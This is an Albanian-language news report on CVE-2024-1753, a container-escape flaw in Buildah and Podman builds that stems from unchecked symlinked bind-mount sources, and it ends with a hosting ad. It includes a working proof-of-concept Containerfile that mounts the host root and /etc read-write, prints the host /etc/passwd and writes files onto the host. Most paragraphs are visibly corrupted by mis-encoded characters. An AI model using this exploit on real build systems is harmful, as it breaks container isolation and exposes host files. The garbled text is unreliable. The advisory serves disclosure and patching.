Dobësia në Buildah dhe Podman, që lejon ndalimin e izolimit të kontejnerit

Në paketat Buildah dhe Podman është identifikuar një dobësi (CVE-2024-1753), e cila lejon qasje të plotë në sistemin e skedarëve të ambientit pritës gjatë fazës së ndërtimit të kontejnerit, i cili ekzekutohet me të drejtat root. Në sistemet me SELinux të aktivizuar, qasja në FSh-në pritëse kufizohet në mënyrë vetëm për lexim. Një rregullim është aktualisht i disponueshëm në formën e një patch-i, i cili u miratua disa minuta më parë në bazën e kodit të Buildah.

DobĂ«sia shkaktohet nga fakti se gjatĂ« ekzekutimit tĂ« montimit tĂ« pjesĂ«ve tĂ« FSh-sĂ« pĂ«rmes komandĂ«s «mount —bind» gjatĂ« ndĂ«rtimit nĂ« fazĂ«n RUN, argumenti me direktorinĂ« burimore (parametri «source=») nuk kontrollohet pĂ«r ekzistencĂ« nĂ« FSh-nĂ« rrĂ«njĂ«sore. NjĂ« skedar konfigurimi i pĂ«rgatitur nga njĂ« sulmues mund tĂ« pĂ«rdorĂ« imazhin e kontejnerit, ku direktoria burimore pĂ«r montim Ă«shtĂ« paraqitur si njĂ« lidhje simbolike nĂ« FSh-nĂ« rrĂ«njĂ«sore. NĂ« kĂ«tĂ« rast, operacioni i montimit do tĂ« çojĂ« nĂ« montimin e FSh-sĂ« rrĂ«njĂ«sore tĂ« ambientit pritĂ«s brenda kontejnerit, duke lejuar nĂ« fazĂ«n RUN qasje tĂ« plotĂ« nĂ« sistemin e skedarĂ«ve tĂ« ambientit pritĂ«s dhe tĂ« organizohet dalja nga kontejneri gjatĂ« ndĂ«rtimit me komandat «buildah build» ose «podman build».

NjĂ« shembull i njĂ« skedari tĂ« keq tĂ« Containerfile, ndĂ«rtimi i tĂ« cilit me komandĂ«n «podman build -f ~/Containerfile .» do tĂ« çonte nĂ« shfaqjen e pĂ«rmbajtjes sĂ« /etc/passwd dhe krijimin e skedarĂ«ve /BIND_BREAKEOUT dhe /etc/BIND_BREAKOUT2 nĂ« ambientin pritĂ«s: FROM alpine as base RUN ln -s / /rootdir RUN ln -s /etc /etc2 FROM alpine RUN echo «ls container root» RUN ls -l / RUN echo «Me shkelje shfaq rrĂ«njĂ«n e pritĂ«s, jo rrĂ«njĂ«n e kontejnerit, dhe krijo /BIND_BREAKOUT nĂ« / nĂ« pritĂ«s» RUN —mount=type=bind,from=base,source=/rootdir,destination=/exploit,rw ls -l /exploit; touch /exploit/BIND_BREAKOUT; ls -l /exploit RUN echo «Me shkelje shfaq /etc/passwd tĂ« pritĂ«s, jo atĂ« tĂ« kontejnerit, dhe krijo /BIND_BREAKOUT2 nĂ« /etc nĂ« pritĂ«s» RUN —mount=type=bind,rw,source=/etc2,destination=/etc2,from=base ls -l /; ls -l /etc2/passwd; cat /etc2/passwd; touch /etc2/BIND_BREAKOUT2; ls -l /etc2

Burimi: opennet.ru

Bleni hostim tĂ« besueshĂ«m pĂ«r faqe me mbrojtje nga DDoS, serverĂ« VPS VDS đŸ”„ Bleni hostim tĂ« besueshĂ«m pĂ«r faqe me mbrojtje nga DDoS, serverĂ« VPS VDS | ProHoster